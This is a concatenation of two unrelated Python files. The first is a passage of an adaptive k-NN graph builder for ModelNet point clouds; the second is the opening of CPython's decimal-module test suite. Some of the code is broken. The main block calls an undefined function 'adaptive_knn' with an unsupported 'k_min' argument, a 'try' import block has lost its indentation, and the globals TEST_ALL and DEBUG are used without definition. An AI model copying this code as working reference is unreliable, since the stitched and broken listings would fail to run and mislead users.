            X1 = X[result_indx[i]].copy()  # neighborhood of i-th point
            x2_indx = indx[i][len(result_indx[i]):]  # candidates dropped in STEP 1
            X2 = X[x2_indx]  # (N_SMAPLE, N_FEATURE)
            if X2.shape[0] == 0:
                continue
            pca = PCA(n_components=2)
            pca.fit(X1)
            # pca_score = pca.explained_variance_ratio_
            V = pca.components_
            # pca_X1=pca.fit_transform(X1)
            # project candidates onto the plane fitted to the kept neighborhood
            mypca_X2 = np.dot(X2 - pca.mean_, V.T)  # (N_SAMPLE, N_FEATURE')
            recover_X2 = pca.inverse_transform(mypca_X2)
            # accept a candidate when its off-plane residual is small relative
            # to its in-plane magnitude (same yita threshold as STEP 1)
            do_select = np.linalg.norm(
                X2 - recover_X2,
                axis=1) <= yita * np.linalg.norm(mypca_X2, axis=1)
            NE = [
                x2_indx[idx] for idx, ii in enumerate(do_select) if ii == True
            ]  # Neighborhood Expansion
            # print("i={}, orig ks={}, NE={}".format(i,X1.shape[0],NE))
            # result_indx[i]+=NE
            if NE != []:
                result_indx[i] = np.append(result_indx[i], NE)
        result_knn_.append(result_indx)
    # publish this worker's results into the shared list in one slice write
    result_knn[start:stop] = result_knn_
def _adaptive_knn_single_model(X, d, k_max, yita=0.32):
    """Compute an adaptive k-NN neighbourhood for every point of one model.

    Implements the two-step adaptive neighbourhood selection:
      STEP 1 - shrink each point's k_max-neighbourhood until the residual
               singular-value ratio drops below ``yita`` (the points look
               locally ``d``-dimensional);
      STEP 2 - expand the neighbourhood with farther points whose PCA
               reconstruction error is small relative to their projection.

    Parameters
    ----------
    X : ndarray of shape (n_points, n_features) — one point cloud.
    d : int — assumed intrinsic dimensionality of the local manifold.
    k_max : int — upper bound on the neighbourhood size.
    yita : float — tolerance on the residual/principal energy ratio.

    Returns
    -------
    list of index arrays; entry ``i`` holds the selected neighbour indices
    of point ``i`` (excluding ``i`` itself).
    """
    nbrs = NearestNeighbors(n_neighbors=k_max + 1,
                            algorithm='ball_tree').fit(X)
    _, indices = nbrs.kneighbors(X)
    indx = indices[:, 1:]  # drop self (column 0) -> nearest k_max neighbours
    k_min = d + 4  # smallest neighbourhood STEP 1 is allowed to shrink to
    n = X.shape[0]
    rho = [[] for _ in range(n)]
    result_indx = [[] for _ in range(n)]
    # STEP 1: shrink neighbourhoods until locally ~d-dimensional.
    for i in range(n):
        found = False
        X_k = np.transpose(X[indx[i]])  # (n_features, n_neighbours)
        for j in range(k_max, k_min, -1):
            centre = np.mean(X_k, axis=1).reshape(-1, 1)
            X_centered = X_k - centre
            # Squared singular values == variance along principal axes.
            _, sigma, _ = np.linalg.svd(X_centered, full_matrices=False)
            sigma = sigma**2
            # Ratio of residual energy (beyond the first d axes) to
            # principal energy; small ratio => locally d-dimensional.
            r_i = np.sqrt(np.sum(sigma[d:]) / np.sum(sigma[:d]))
            if r_i < yita:
                result_indx[i] = indx[i][:j]
                rho[i].append(r_i)
                found = True
                break
            rho[i].append(r_i)
            X_k = X_k[:, :-1]  # drop the farthest neighbour and retry
        if not found:
            # No cut-off reached: keep the size with the smallest ratio.
            best = np.argmin(rho[i])
            result_indx[i] = indx[i][:k_max - best]
    # STEP 2: neighbourhood expansion via PCA reconstruction error.
    for i in range(n):
        X1 = X[result_indx[i]].copy()  # current neighbourhood of point i
        x2_indx = indx[i][len(result_indx[i]):]  # rejected farther points
        X2 = X[x2_indx]
        if X2.shape[0] == 0:
            continue
        pca = PCA(n_components=d)
        pca.fit(X1)
        V = pca.components_
        projected = np.dot(X2 - pca.mean_, V.T)
        recovered = pca.inverse_transform(projected)
        # Re-admit points whose off-plane residual is small relative to
        # their in-plane magnitude.
        keep = np.linalg.norm(X2 - recovered,
                              axis=1) <= yita * np.linalg.norm(projected,
                                                               axis=1)
        expansion = [x2_indx[idx] for idx, sel in enumerate(keep) if sel]
        if expansion:
            result_indx[i] = np.append(result_indx[i], expansion)
    return result_indx


@timeit
def multi_threads_adaptive_knn(filename=None, savename=None, d=2, k_max=16):
    """Build adaptive k-NN graphs for every model in a .npy dataset and save
    them as sparse adjacency matrices.

    NOTE(review): despite the name, this implementation is sequential; the
    original multiprocessing code was commented out and has been removed.

    Parameters
    ----------
    filename : str — path to a .npy file storing a pickled dict with keys
        'data' (n_model, n_point, n_feature), 'label' and 'seg_label'.
    savename : str or None — output path; derived from ``filename`` when None.
    d : int — assumed local intrinsic dimensionality (was previously ignored:
        the code hard-coded 2; with the default d=2 behaviour is unchanged).
    k_max : int — maximum neighbourhood size.
    """
    if filename is None:
        print("need a file name")
        return
    # allow_pickle=True is required on NumPy >= 1.16.3 because the archive
    # stores a Python dict (object array).
    archive = np.load(filename, encoding='latin1', allow_pickle=True)
    dataset = archive.tolist()['data']  # (n_model, n_point, n_feature)
    labels = archive.tolist()['label']  # (n_model,)
    print("the dataset shape is {}".format(dataset.shape))
    n_model, n_point, _ = dataset.shape
    print("k_max={}".format(k_max))
    result_knn = []
    for model_i in range(n_model):
        if model_i % 100 == 0:
            print(model_i)  # progress indicator
        result_knn.append(_adaptive_knn_single_model(dataset[model_i], d, k_max))
    if len(result_knn) != n_model:
        raise Exception("len of result_knn!=n_model")
    # Convert each model's neighbour lists into an (n_point, n_point)
    # sparse 0/1 adjacency matrix.
    for i in range(n_model):
        neighbour_lists = result_knn[i]
        rows = []
        cols = []
        for row, col_indices in enumerate(neighbour_lists):
            rows += [row for _ in col_indices]
            cols += list(col_indices)
        result_knn[i] = sp.csr_matrix(
            (np.ones(len(rows), dtype='int32'), (rows, cols)),
            shape=(n_point, n_point))
    if savename is None:
        # e.g. './x/modelNet10_train_16nn_GM.npy'
        #   -> './x/modelNet10_train_16nn_GM_adaptive_knn_sparse.npy'
        savename = "".join(filename.split('.npy')) + "_adaptive_knn_sparse.npy"
    np.save(savename,
            np.array({
                'data': dataset,
                'graph': result_knn,
                'seg_label': archive.tolist()['seg_label'],
                'label': labels
            }))
    print("saved to {}".format(savename))
if __name__ == '__main__':
    # Build the adaptive 32-NN sparse graph for the ModelNet40 test split.
    source_path = './modelnet/data/modelNet40_test_16nn_GM.npy'
    target_path = "".join(source_path.split('.npy')) + "_adaptive_32knn_sparse.npy"
    adaptive_knn(filename=source_path, savename=target_path, k_max=32, k_min=16)
    # To inspect the result: np.load(target_path, allow_pickle=True)
|
test_decimal.py | # Copyright (c) 2004 Python Software Foundation.
# All rights reserved.
# Written by Eric Price <eprice at tjhsst.edu>
# and Facundo Batista <facundo at taniquetil.com.ar>
# and Raymond Hettinger <python at rcn.com>
# and Aahz (aahz at pobox.com)
# and Tim Peters
"""
These are the test cases for the Decimal module.
There are two groups of tests, Arithmetic and Behaviour. The former test
the Decimal arithmetic using the tests provided by Mike Cowlishaw. The latter
test the pythonic behaviour according to PEP 327.
Cowlishaw's tests can be downloaded from:
http://speleotrove.com/decimal/dectest.zip
This test module can be called from command line with one parameter (Arithmetic
or Behaviour) to test each part, or without parameter to test both parts. If
you're working through IDLE, you can import this test module and call test_main()
with the corresponding argument.
"""
import math
import os, sys
import operator
import warnings
import pickle, copy
import unittest
import numbers
import locale
from test.support import (run_unittest, run_doctest, is_resource_enabled,
requires_IEEE_754, requires_docstrings)
from test.support import (check_warnings, import_fresh_module, TestFailed,
run_with_locale, cpython_only)
import random
import time
import warnings
import inspect
try:
import threading
except ImportError:
threading = None
# Import both implementations under test: C (backed by _decimal) and pure
# Python (P).  C is None when the _decimal extension is unavailable.
C = import_fresh_module('decimal', fresh=['_decimal'])
P = import_fresh_module('decimal', blocked=['_decimal'])
orig_sys_decimal = sys.modules['decimal']

# fractions module must import the correct decimal module.
# Temporarily swap sys.modules['decimal'] so each fresh fractions import
# binds to the matching decimal implementation, then restore the original.
cfractions = import_fresh_module('fractions', fresh=['fractions'])
sys.modules['decimal'] = P
pfractions = import_fresh_module('fractions', fresh=['fractions'])
sys.modules['decimal'] = C
fractions = {C:cfractions, P:pfractions}
sys.modules['decimal'] = orig_sys_decimal

# Useful Test Constant
# Signals[m]: every signal class known to implementation m (keys of a
# freshly created context's flags dict).
Signals = {
  C: tuple(C.getcontext().flags.keys()) if C else None,
  P: tuple(P.getcontext().flags.keys())
}
# Signals ordered with respect to precedence: when an operation
# produces multiple signals, signals occurring later in the list
# should be handled before those occurring earlier in the list.
OrderedSignals = {
  C: [C.Clamped, C.Rounded, C.Inexact, C.Subnormal, C.Underflow,
      C.Overflow, C.DivisionByZero, C.InvalidOperation,
      C.FloatOperation] if C else None,
  P: [P.Clamped, P.Rounded, P.Inexact, P.Subnormal, P.Underflow,
      P.Overflow, P.DivisionByZero, P.InvalidOperation,
      P.FloatOperation]
}
def assert_signals(cls, context, attr, expected):
    """Assert that exactly the signals in *expected* are set in context.<attr>.

    *attr* names a mapping on the context (e.g. 'flags' or 'traps'); every
    signal listed in *expected* must be set and every other signal clear.
    """
    signal_map = getattr(context, attr)
    all_match = all((sig in expected) == bool(signal_map[sig])
                    for sig in signal_map)
    cls.assertTrue(all_match)
# Rounding-mode constants, taken from the pure-Python implementation.
ROUND_UP = P.ROUND_UP
ROUND_DOWN = P.ROUND_DOWN
ROUND_CEILING = P.ROUND_CEILING
ROUND_FLOOR = P.ROUND_FLOOR
ROUND_HALF_UP = P.ROUND_HALF_UP
ROUND_HALF_DOWN = P.ROUND_HALF_DOWN
ROUND_HALF_EVEN = P.ROUND_HALF_EVEN
ROUND_05UP = P.ROUND_05UP

# Every rounding mode, for tests that iterate over all of them.
RoundingModes = [
    ROUND_UP, ROUND_DOWN, ROUND_CEILING, ROUND_FLOOR,
    ROUND_HALF_UP, ROUND_HALF_DOWN, ROUND_HALF_EVEN,
    ROUND_05UP
]

# Tests are built around these assumed context defaults.
# test_main() restores the original context.
ORIGINAL_CONTEXT = {
    C: C.getcontext().copy() if C else None,
    P: P.getcontext().copy()
}
def init(m):
    """Install the default test context on implementation *m*.

    The test context uses prec=9, ROUND_HALF_EVEN, and no traps enabled.
    Does nothing when *m* is falsy (e.g. the C build is unavailable).
    """
    if not m:
        return
    no_traps = dict.fromkeys(Signals[m], 0)
    test_context = m.Context(prec=9, rounding=ROUND_HALF_EVEN, traps=no_traps)
    m.setcontext(test_context)
# Location of Cowlishaw's .decTest data files, relative to this test module.
TESTDATADIR = 'decimaltestdata'
if __name__ == '__main__':
    file = sys.argv[0]
else:
    file = __file__
testdir = os.path.dirname(file) or os.curdir
directory = testdir + os.sep + TESTDATADIR + os.sep

# Skip the IBM test cases entirely when the data directory is absent.
skip_expected = not os.path.isdir(directory)

# Make sure it actually raises errors when not expected and caught in flags
# Slower, since it runs some things several times.
EXTENDEDERRORTEST = False

# Test extra functionality in the C version (-DEXTRA_FUNCTIONALITY).
# hasattr() already yields a bool; no need for a conditional expression.
# (hasattr on C is safe even when C is None: it simply returns False.)
EXTRA_FUNCTIONALITY = hasattr(C, 'DecClamped')
requires_extra_functionality = unittest.skipUnless(
  EXTRA_FUNCTIONALITY, "test requires build with -DEXTRA_FUNCTIONALITY")
skip_if_extra_functionality = unittest.skipIf(
  EXTRA_FUNCTIONALITY, "test requires regular build")
class IBMTestCases(unittest.TestCase):
    """Class which tests the Decimal class against the IBM test cases.

    Subclasses set ``decimal`` to either the C or the pure-Python module.
    """

    def setUp(self):
        # Fresh contexts per test: one for running operations, one for
        # reading operands with relaxed limits (see read_unlimited).
        self.context = self.decimal.Context()
        self.readcontext = self.decimal.Context()
        self.ignore_list = ['#']

        # List of individual .decTest test ids that correspond to tests that
        # we're skipping for one reason or another.
        self.skipped_test_ids = set([
            # Skip implementation-specific scaleb tests.
            'scbx164',
            'scbx165',

            # For some operations (currently exp, ln, log10, power), the decNumber
            # reference implementation imposes additional restrictions on the context
            # and operands. These restrictions are not part of the specification;
            # however, the effect of these restrictions does show up in some of the
            # testcases. We skip testcases that violate these restrictions, since
            # Decimal behaves differently from decNumber for these testcases so these
            # testcases would otherwise fail.
            'expx901',
            'expx902',
            'expx903',
            'expx905',
            'lnx901',
            'lnx902',
            'lnx903',
            'lnx905',
            'logx901',
            'logx902',
            'logx903',
            'logx905',
            'powx1183',
            'powx1184',
            'powx4001',
            'powx4002',
            'powx4003',
            'powx4005',
            'powx4008',
            'powx4010',
            'powx4012',
            'powx4014',
            ])

        if self.decimal == C:
            # status has additional Subnormal, Underflow
            self.skipped_test_ids.add('pwsx803')
            self.skipped_test_ids.add('pwsx805')
            # Correct rounding (skipped for decNumber, too)
            self.skipped_test_ids.add('powx4302')
            self.skipped_test_ids.add('powx4303')
            self.skipped_test_ids.add('powx4342')
            self.skipped_test_ids.add('powx4343')
            # http://bugs.python.org/issue7049
            self.skipped_test_ids.add('pwmx325')
            self.skipped_test_ids.add('pwmx326')

        # Map test directives to setter functions.
        self.ChangeDict = {'precision' : self.change_precision,
                           'rounding' : self.change_rounding_method,
                           'maxexponent' : self.change_max_exponent,
                           'minexponent' : self.change_min_exponent,
                           'clamp' : self.change_clamp}

        # Name adapter to be able to change the Decimal and Context
        # interface without changing the test files from Cowlishaw.
        self.NameAdapter = {'and':'logical_and',
                            'apply':'_apply',
                            'class':'number_class',
                            'comparesig':'compare_signal',
                            'comparetotal':'compare_total',
                            'comparetotmag':'compare_total_mag',
                            'copy':'copy_decimal',
                            'copyabs':'copy_abs',
                            'copynegate':'copy_negate',
                            'copysign':'copy_sign',
                            'divideint':'divide_int',
                            'invert':'logical_invert',
                            'iscanonical':'is_canonical',
                            'isfinite':'is_finite',
                            'isinfinite':'is_infinite',
                            'isnan':'is_nan',
                            'isnormal':'is_normal',
                            'isqnan':'is_qnan',
                            'issigned':'is_signed',
                            'issnan':'is_snan',
                            'issubnormal':'is_subnormal',
                            'iszero':'is_zero',
                            'maxmag':'max_mag',
                            'minmag':'min_mag',
                            'nextminus':'next_minus',
                            'nextplus':'next_plus',
                            'nexttoward':'next_toward',
                            'or':'logical_or',
                            'reduce':'normalize',
                            'remaindernear':'remainder_near',
                            'samequantum':'same_quantum',
                            'squareroot':'sqrt',
                            'toeng':'to_eng_string',
                            'tointegral':'to_integral_value',
                            'tointegralx':'to_integral_exact',
                            'tosci':'to_sci_string',
                            'xor':'logical_xor'}

        # Map the test cases' error names to the actual errors.
        self.ErrorNames = {'clamped' : self.decimal.Clamped,
                           'conversion_syntax' : self.decimal.InvalidOperation,
                           'division_by_zero' : self.decimal.DivisionByZero,
                           'division_impossible' : self.decimal.InvalidOperation,
                           'division_undefined' : self.decimal.InvalidOperation,
                           'inexact' : self.decimal.Inexact,
                           'invalid_context' : self.decimal.InvalidOperation,
                           'invalid_operation' : self.decimal.InvalidOperation,
                           'overflow' : self.decimal.Overflow,
                           'rounded' : self.decimal.Rounded,
                           'subnormal' : self.decimal.Subnormal,
                           'underflow' : self.decimal.Underflow}

        # Map test-case names to roundings.
        self.RoundingDict = {'ceiling' : ROUND_CEILING,
                             'down' : ROUND_DOWN,
                             'floor' : ROUND_FLOOR,
                             'half_down' : ROUND_HALF_DOWN,
                             'half_even' : ROUND_HALF_EVEN,
                             'half_up' : ROUND_HALF_UP,
                             'up' : ROUND_UP,
                             '05up' : ROUND_05UP}

        # The following functions return True/False rather than a
        # Decimal instance.
        self.LogicalFunctions = ('is_canonical',
                                 'is_finite',
                                 'is_infinite',
                                 'is_nan',
                                 'is_normal',
                                 'is_qnan',
                                 'is_signed',
                                 'is_snan',
                                 'is_subnormal',
                                 'is_zero',
                                 'same_quantum')

    def read_unlimited(self, v, context):
        """Work around the limitations of the 32-bit _decimal version. The
        guaranteed maximum values for prec, Emax etc. are 425000000,
        but higher values usually work, except for rare corner cases.
        In particular, all of the IBM tests pass with maximum values
        of 1070000000."""
        if self.decimal == C and self.decimal.MAX_EMAX == 425000000:
            self.readcontext._unsafe_setprec(1070000000)
            self.readcontext._unsafe_setemax(1070000000)
            self.readcontext._unsafe_setemin(-1070000000)
            return self.readcontext.create_decimal(v)
        else:
            return self.decimal.Decimal(v, context)

    def eval_file(self, file):
        """Run every test line of one .decTest file through eval_line."""
        global skip_expected
        if skip_expected:
            raise unittest.SkipTest
        with open(file) as f:
            for line in f:
                line = line.replace('\r\n', '').replace('\n', '')
                #print line
                try:
                    t = self.eval_line(line)
                except self.decimal.DecimalException as exception:
                    #Exception raised where there shouldn't have been one.
                    self.fail('Exception "'+exception.__class__.__name__ + '" raised on line '+line)

    def eval_line(self, s):
        """Strip comments from a test line and dispatch it to either
        eval_directive (contains ':') or eval_equation."""
        if s.find(' -> ') >= 0 and s[:2] != '--' and not s.startswith(' --'):
            s = (s.split('->')[0] + '->' +
                 s.split('->')[1].split('--')[0]).strip()
        else:
            s = s.split('--')[0].strip()

        for ignore in self.ignore_list:
            if s.find(ignore) >= 0:
                #print s.split()[0], 'NotImplemented--', ignore
                return
        if not s:
            return
        elif ':' in s:
            return self.eval_directive(s)
        else:
            return self.eval_equation(s)

    def eval_directive(self, s):
        """Apply a 'name: value' context directive via ChangeDict."""
        funct, value = (x.strip().lower() for x in s.split(':'))
        if funct == 'rounding':
            value = self.RoundingDict[value]
        else:
            try:
                value = int(value)
            except ValueError:
                pass

        funct = self.ChangeDict.get(funct, (lambda *args: None))
        funct(value)

    def eval_equation(self, s):
        """Parse and execute one 'id funct operands -> answer flags' test line.

        NOTE(review): TEST_ALL and DEBUG are module-level globals defined
        outside this chunk.
        """
        if not TEST_ALL and random.random() < 0.90:
            return
        self.context.clear_flags()

        try:
            Sides = s.split('->')
            L = Sides[0].strip().split()
            id = L[0]
            if DEBUG:
                print("Test ", id, end=" ")
            funct = L[1].lower()
            valstemp = L[2:]
            L = Sides[1].strip().split()
            ans = L[0]
            exceptions = L[1:]
        except (TypeError, AttributeError, IndexError):
            raise self.decimal.InvalidOperation
        def FixQuotes(val):
            # Collapse doubled quotes to placeholders, strip the real
            # quotes, then restore single literal quote characters.
            val = val.replace("''", 'SingleQuote').replace('""', 'DoubleQuote')
            val = val.replace("'", '').replace('"', '')
            val = val.replace('SingleQuote', "'").replace('DoubleQuote', '"')
            return val

        if id in self.skipped_test_ids:
            return

        fname = self.NameAdapter.get(funct, funct)
        if fname == 'rescale':
            return
        funct = getattr(self.context, fname)
        vals = []
        conglomerate = ''
        quote = 0
        theirexceptions = [self.ErrorNames[x.lower()] for x in exceptions]

        for exception in Signals[self.decimal]:
            self.context.traps[exception] = 1 #Catch these bugs...
        for exception in theirexceptions:
            self.context.traps[exception] = 0
        for i, val in enumerate(valstemp):
            # Re-join quoted operands that were split on whitespace.
            if val.count("'") % 2 == 1:
                quote = 1 - quote
            if quote:
                conglomerate = conglomerate + ' ' + val
                continue
            else:
                val = conglomerate + val
                conglomerate = ''
            v = FixQuotes(val)
            if fname in ('to_sci_string', 'to_eng_string'):
                if EXTENDEDERRORTEST:
                    for error in theirexceptions:
                        self.context.traps[error] = 1
                        try:
                            funct(self.context.create_decimal(v))
                        except error:
                            pass
                        except Signals[self.decimal] as e:
                            self.fail("Raised %s in %s when %s disabled" % \
                                      (e, s, error))
                        else:
                            self.fail("Did not raise %s in %s" % (error, s))
                        self.context.traps[error] = 0
                v = self.context.create_decimal(v)
            else:
                v = self.read_unlimited(v, self.context)
            vals.append(v)

        ans = FixQuotes(ans)

        if EXTENDEDERRORTEST and fname not in ('to_sci_string', 'to_eng_string'):
            for error in theirexceptions:
                self.context.traps[error] = 1
                try:
                    funct(*vals)
                except error:
                    pass
                except Signals[self.decimal] as e:
                    self.fail("Raised %s in %s when %s disabled" % \
                              (e, s, error))
                else:
                    self.fail("Did not raise %s in %s" % (error, s))
                self.context.traps[error] = 0

            # as above, but add traps cumulatively, to check precedence
            ordered_errors = [e for e in OrderedSignals[self.decimal] if e in theirexceptions]
            for error in ordered_errors:
                self.context.traps[error] = 1
                try:
                    funct(*vals)
                except error:
                    pass
                except Signals[self.decimal] as e:
                    self.fail("Raised %s in %s; expected %s" %
                              (type(e), s, error))
                else:
                    self.fail("Did not raise %s in %s" % (error, s))
            # reset traps
            for error in ordered_errors:
                self.context.traps[error] = 0

        if DEBUG:
            print("--", self.context)
        try:
            result = str(funct(*vals))
            if fname in self.LogicalFunctions:
                result = str(int(eval(result))) # 'True', 'False' -> '1', '0'
        except Signals[self.decimal] as error:
            self.fail("Raised %s in %s" % (error, s))
        except: #Catch any error long enough to state the test case.
            print("ERROR:", s)
            raise

        myexceptions = self.getexceptions()

        myexceptions.sort(key=repr)
        theirexceptions.sort(key=repr)

        self.assertEqual(result, ans,
                         'Incorrect answer for ' + s + ' -- got ' + result)

        self.assertEqual(myexceptions, theirexceptions,
                         'Incorrect flags set in ' + s + ' -- got ' + str(myexceptions))

    def getexceptions(self):
        """Return the list of signals currently set in the context's flags."""
        return [e for e in Signals[self.decimal] if self.context.flags[e]]

    # Context setters used by eval_directive; the C build with limited
    # prec/Emax (425000000) needs the _unsafe_* back doors.
    def change_precision(self, prec):
        if self.decimal == C and self.decimal.MAX_PREC == 425000000:
            self.context._unsafe_setprec(prec)
        else:
            self.context.prec = prec
    def change_rounding_method(self, rounding):
        self.context.rounding = rounding
    def change_min_exponent(self, exp):
        if self.decimal == C and self.decimal.MAX_PREC == 425000000:
            self.context._unsafe_setemin(exp)
        else:
            self.context.Emin = exp
    def change_max_exponent(self, exp):
        if self.decimal == C and self.decimal.MAX_PREC == 425000000:
            self.context._unsafe_setemax(exp)
        else:
            self.context.Emax = exp
    def change_clamp(self, clamp):
        self.context.clamp = clamp
class CIBMTestCases(IBMTestCases):
    # Run the IBM test cases against the C implementation (_decimal).
    decimal = C
class PyIBMTestCases(IBMTestCases):
    # Run the IBM test cases against the pure-Python implementation.
    decimal = P
# The following classes test the behaviour of Decimal according to PEP 327
class ExplicitConstructionTest(unittest.TestCase):
    '''Unit tests for Explicit Construction cases of Decimal.'''

    def test_explicit_empty(self):
        Decimal = self.decimal.Decimal
        self.assertEqual(Decimal(), Decimal("0"))

    def test_explicit_from_None(self):
        Decimal = self.decimal.Decimal
        self.assertRaises(TypeError, Decimal, None)

    def test_explicit_from_int(self):
        Decimal = self.decimal.Decimal

        #positive
        d = Decimal(45)
        self.assertEqual(str(d), '45')

        #very large positive
        d = Decimal(500000123)
        self.assertEqual(str(d), '500000123')

        #negative
        d = Decimal(-45)
        self.assertEqual(str(d), '-45')

        #zero
        d = Decimal(0)
        self.assertEqual(str(d), '0')

        # single word longs
        # Exercise values around powers of two to hit digit-limb boundaries.
        for n in range(0, 32):
            for sign in (-1, 1):
                for x in range(-5, 5):
                    i = sign * (2**n + x)
                    d = Decimal(i)
                    self.assertEqual(str(d), str(i))

    def test_explicit_from_string(self):
        Decimal = self.decimal.Decimal
        InvalidOperation = self.decimal.InvalidOperation
        localcontext = self.decimal.localcontext

        #empty
        self.assertEqual(str(Decimal('')), 'NaN')

        #int
        self.assertEqual(str(Decimal('45')), '45')

        #float
        self.assertEqual(str(Decimal('45.34')), '45.34')

        #engineer notation
        self.assertEqual(str(Decimal('45e2')), '4.5E+3')

        #just not a number
        self.assertEqual(str(Decimal('ugly')), 'NaN')

        #leading and trailing whitespace permitted
        self.assertEqual(str(Decimal('1.3E4 \n')), '1.3E+4')
        self.assertEqual(str(Decimal(' -7.89')), '-7.89')
        self.assertEqual(str(Decimal(" 3.45679 ")), '3.45679')

        # underscores
        self.assertEqual(str(Decimal('1_3.3e4_0')), '1.33E+41')
        self.assertEqual(str(Decimal('1_0_0_0')), '1000')

        # unicode whitespace
        for lead in ["", ' ', '\u00a0', '\u205f']:
            for trail in ["", ' ', '\u00a0', '\u205f']:
                self.assertEqual(str(Decimal(lead + '9.311E+28' + trail)),
                                 '9.311E+28')

        with localcontext() as c:
            # With InvalidOperation trapped, malformed strings raise
            # instead of producing a quiet NaN.
            c.traps[InvalidOperation] = True
            # Invalid string
            self.assertRaises(InvalidOperation, Decimal, "xyz")
            # Two arguments max
            self.assertRaises(TypeError, Decimal, "1234", "x", "y")

            # space within the numeric part
            self.assertRaises(InvalidOperation, Decimal, "1\u00a02\u00a03")
            self.assertRaises(InvalidOperation, Decimal, "\u00a01\u00a02\u00a0")

            # unicode whitespace
            self.assertRaises(InvalidOperation, Decimal, "\u00a0")
            self.assertRaises(InvalidOperation, Decimal, "\u00a0\u00a0")

            # embedded NUL
            self.assertRaises(InvalidOperation, Decimal, "12\u00003")

            # underscores don't prevent errors
            self.assertRaises(InvalidOperation, Decimal, "1_2_\u00003")

    @cpython_only
    def test_from_legacy_strings(self):
        import _testcapi
        Decimal = self.decimal.Decimal
        context = self.decimal.Context()

        s = _testcapi.unicode_legacy_string('9.999999')
        self.assertEqual(str(Decimal(s)), '9.999999')
        self.assertEqual(str(context.create_decimal(s)), '9.999999')

    def test_explicit_from_tuples(self):
        Decimal = self.decimal.Decimal

        #zero
        d = Decimal( (0, (0,), 0) )
        self.assertEqual(str(d), '0')

        #int
        d = Decimal( (1, (4, 5), 0) )
        self.assertEqual(str(d), '-45')

        #float
        d = Decimal( (0, (4, 5, 3, 4), -2) )
        self.assertEqual(str(d), '45.34')

        #weird
        d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
        self.assertEqual(str(d), '-4.34913534E-17')

        #inf
        d = Decimal( (0, (), "F") )
        self.assertEqual(str(d), 'Infinity')

        #wrong number of items
        self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1)) )

        #bad sign
        self.assertRaises(ValueError, Decimal, (8, (4, 3, 4, 9, 1), 2) )
        self.assertRaises(ValueError, Decimal, (0., (4, 3, 4, 9, 1), 2) )
        self.assertRaises(ValueError, Decimal, (Decimal(1), (4, 3, 4, 9, 1), 2))

        #bad exp
        self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), 'wrong!') )
        self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), 0.) )
        self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), '1') )

        #bad coefficients
        self.assertRaises(ValueError, Decimal, (1, "xyz", 2) )
        self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, None, 1), 2) )
        self.assertRaises(ValueError, Decimal, (1, (4, -3, 4, 9, 1), 2) )
        self.assertRaises(ValueError, Decimal, (1, (4, 10, 4, 9, 1), 2) )
        self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 'a', 1), 2) )

    def test_explicit_from_list(self):
        # Lists (and mixed list/tuple) are accepted like tuples.
        Decimal = self.decimal.Decimal

        d = Decimal([0, [0], 0])
        self.assertEqual(str(d), '0')

        d = Decimal([1, [4, 3, 4, 9, 1, 3, 5, 3, 4], -25])
        self.assertEqual(str(d), '-4.34913534E-17')

        d = Decimal([1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25])
        self.assertEqual(str(d), '-4.34913534E-17')

        d = Decimal((1, [4, 3, 4, 9, 1, 3, 5, 3, 4], -25))
        self.assertEqual(str(d), '-4.34913534E-17')

    def test_explicit_from_bool(self):
        Decimal = self.decimal.Decimal

        self.assertIs(bool(Decimal(0)), False)
        self.assertIs(bool(Decimal(1)), True)
        self.assertEqual(Decimal(False), Decimal(0))
        self.assertEqual(Decimal(True), Decimal(1))

    def test_explicit_from_Decimal(self):
        Decimal = self.decimal.Decimal

        #positive
        d = Decimal(45)
        e = Decimal(d)
        self.assertEqual(str(e), '45')

        #very large positive
        d = Decimal(500000123)
        e = Decimal(d)
        self.assertEqual(str(e), '500000123')

        #negative
        d = Decimal(-45)
        e = Decimal(d)
        self.assertEqual(str(e), '-45')

        #zero
        d = Decimal(0)
        e = Decimal(d)
        self.assertEqual(str(e), '0')

    @requires_IEEE_754
    def test_explicit_from_float(self):

        Decimal = self.decimal.Decimal

        r = Decimal(0.1)
        self.assertEqual(type(r), Decimal)
        self.assertEqual(str(r),
                '0.1000000000000000055511151231257827021181583404541015625')
        self.assertTrue(Decimal(float('nan')).is_qnan())
        self.assertTrue(Decimal(float('inf')).is_infinite())
        self.assertTrue(Decimal(float('-inf')).is_infinite())
        self.assertEqual(str(Decimal(float('nan'))),
                         str(Decimal('NaN')))
        self.assertEqual(str(Decimal(float('inf'))),
                         str(Decimal('Infinity')))
        self.assertEqual(str(Decimal(float('-inf'))),
                         str(Decimal('-Infinity')))
        self.assertEqual(str(Decimal(float('-0.0'))),
                         str(Decimal('-0')))
        for i in range(200):
            x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
            self.assertEqual(x, float(Decimal(x))) # roundtrip

    def test_explicit_context_create_decimal(self):
        Decimal = self.decimal.Decimal
        InvalidOperation = self.decimal.InvalidOperation
        Rounded = self.decimal.Rounded

        nc = copy.copy(self.decimal.getcontext())
        nc.prec = 3

        # empty
        d = Decimal()
        self.assertEqual(str(d), '0')
        d = nc.create_decimal()
        self.assertEqual(str(d), '0')

        # from None
        self.assertRaises(TypeError, nc.create_decimal, None)

        # from int
        d = nc.create_decimal(456)
        self.assertIsInstance(d, Decimal)
        self.assertEqual(nc.create_decimal(45678),
                         nc.create_decimal('457E+2'))

        # from string
        d = Decimal('456789')
        self.assertEqual(str(d), '456789')
        d = nc.create_decimal('456789')
        self.assertEqual(str(d), '4.57E+5')
        # leading and trailing whitespace should result in a NaN;
        # spaces are already checked in Cowlishaw's test-suite, so
        # here we just check that a trailing newline results in a NaN
        self.assertEqual(str(nc.create_decimal('3.14\n')), 'NaN')

        # from tuples
        d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
        self.assertEqual(str(d), '-4.34913534E-17')
        d = nc.create_decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
        self.assertEqual(str(d), '-4.35E-17')

        # from Decimal
        prevdec = Decimal(500000123)
        d = Decimal(prevdec)
        self.assertEqual(str(d), '500000123')
        d = nc.create_decimal(prevdec)
        self.assertEqual(str(d), '5.00E+8')

        # more integers
        nc.prec = 28
        nc.traps[InvalidOperation] = True

